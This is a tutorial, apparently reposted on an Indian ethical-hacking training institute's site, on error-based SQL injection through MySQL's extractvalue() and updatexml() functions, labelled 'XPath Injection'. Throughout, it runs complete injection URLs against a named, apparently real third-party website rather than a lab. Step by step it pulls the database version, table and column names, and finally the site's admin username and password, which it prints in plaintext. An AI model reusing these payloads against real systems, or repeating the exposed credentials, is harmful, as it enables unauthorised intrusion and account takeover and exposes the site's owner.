Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

XPath Injection guide

Credits: Brother Downfall

Extract Value

I’ll be using this site as an example.

Code:
http://leadacidbatteryinfo.org/newsdetail.php?id=51

Version (ExtractValue)

Code:
+and+extractvalue(rand(),concat(0x7e,version()))--

This will return our XPATH Syntax error, and give us our version.
This is what my link looks like.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,version()))--

 

Code:
XPATH syntax error: '~5.1.52-log'

[Image: FfpxR.jpg]
You should get your version.

Getting The Tables (Extract Value)

Code:
+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))--

My link looks like this.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))--

So lets load it up and see if we get our first table name!

[Image: z46oS.jpg]

 

Code:
XPATH syntax error: '~pdigclicks'

Woot it worked! Now we just increment in our limit statement until we find our table we want columns from.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+[b]1[/b],1)))--

 

Code:
XPATH syntax error: '~pdigengine'

-.-

We want users or admin..

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+[b]2[/b],1)))--

 

Code:
XPATH syntax error: '~pdigexcludes'

 

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+[b]10[/b],1)))--

 

Code:
XPATH syntax error: '~tbladmin'

Woot, now let’s get the columns.

Getting The Columns (ExtractValue)

First off, we want to convert our table name to hex.

My table name was tbladmin.

Whenever you convert something to hex, you add 0x in front of it.
It tells the site to read the hex value.

The hex of tbladmin is 74626c61646d696e
So it should look like this.

Code:
0x74626c61646d696e

Now to get our columns, we change our syntax a bit, but it’s still generally the same idea.

Code:
+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0xTABLE_HEX+limit+0,1)))--]

Of course, replace TABLE_HEX with the hex value of your table name.

My link looks like this.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x74626c61646d696e+limit+0,1)))--

 

[Image: H7zQR.jpg]

 

Code:
XPATH syntax error: '~adminid'

Now use increment in your limit statement until you find the columns you want.

Getting Data Out of Columns (ExtractValue)

Now that you’ve got your column names, you’re going to want to put them in a concat statement.

Code:
+and+extractvalue(rand(),concat(0x7e,(select+concat(column1,0x7e,column2)+from+TABLENAME+limit+0,1)))--

My columns I wanted were username and password, the 0x7e is the hex value of “~” which I’ll use as a seperator.

My link looks like this.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+concat(username,0x7e,password)+from+tbladmin+limit+0,1)))--

And as you can see, we get our XPath error with the admin login.

[Image: uPBEU.jpg]

 

Code:
XPATH syntax error: '~ishir~ishir123'

UpdateXML

Getting The Version (UpdateXML)

Code:
+and+updatexml(0x7e,concat(0x7e,(version())),0)--

My link looks like this..

Code:
leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,(version())),0)--

We get our XPATH Error that returns the version.

Code:
XPATH syntax error: '~5.1.52-log'

 

[Image: oeoua.jpg]

Getting The Tables (UpdateXML)

Code:
+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1))),0)--

My link looks like this..

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1))),0)--

 

[Image: n5uhD.jpg]

 

Code:
XPATH syntax error: '~pdigclicks'

Now we know our first table is called pdigclicks. Let’s see what else is in here….

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+1,1))),0)--

 

Code:
XPATH syntax error: '~pdigengine'

For the sake of time, I know the table name I want is tbladmin.

Code:
leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+10,1))),0)--

And there’s our table.

Code:
XPATH syntax error: '~tbladmin'

Now let’s get the columns from the table.

Getting Columns (UpdateXML)

Now it’s the same idea, we just change the tables to columns, from the table name.

Code:
+and+updatexml(0x7e,concat(0x7e,((select+concat(column_name)+from+information_schema.columns+where+table_name=0xTABLE_HEX+limit+0,1))),0)--

Now my table name was tbladmin, so I convert that to hex and get 74626c61646d696e

My link looks like this.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(column_name)+from+information_schema.columns+where+table_name=0x74626c61646d696e+limit+0,1))),0)--

 

Code:
XPATH syntax error: '~adminid'

 

[Image: MDc7F.jpg]

Getting Data (UpdateXML)

Now once you’ve got your columns, concatenate them and get the from the table you want.

Code:
leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(column1,0x7e,column2)+from+TABLENAME+limit+0,1))),0)--

My link looks like this..

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(username,0x7e,password)+from+tbladmin+limit+0,1))),0)--

 

Code:
XPATH syntax error: '~ishir~ishir123'

 

[Image: 9OI3v.jpg]

Let me know if you need help.

www.extremehacking.org
Cyber Suraksha AbhiyanCEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY,MCITP,RHCE,CHECKPOINT, ASA FIREWALL,VMWARE,CLOUD,ANDROID,IPHONE,NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNECertified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-IndiaEthical Hacking Course in Pune-India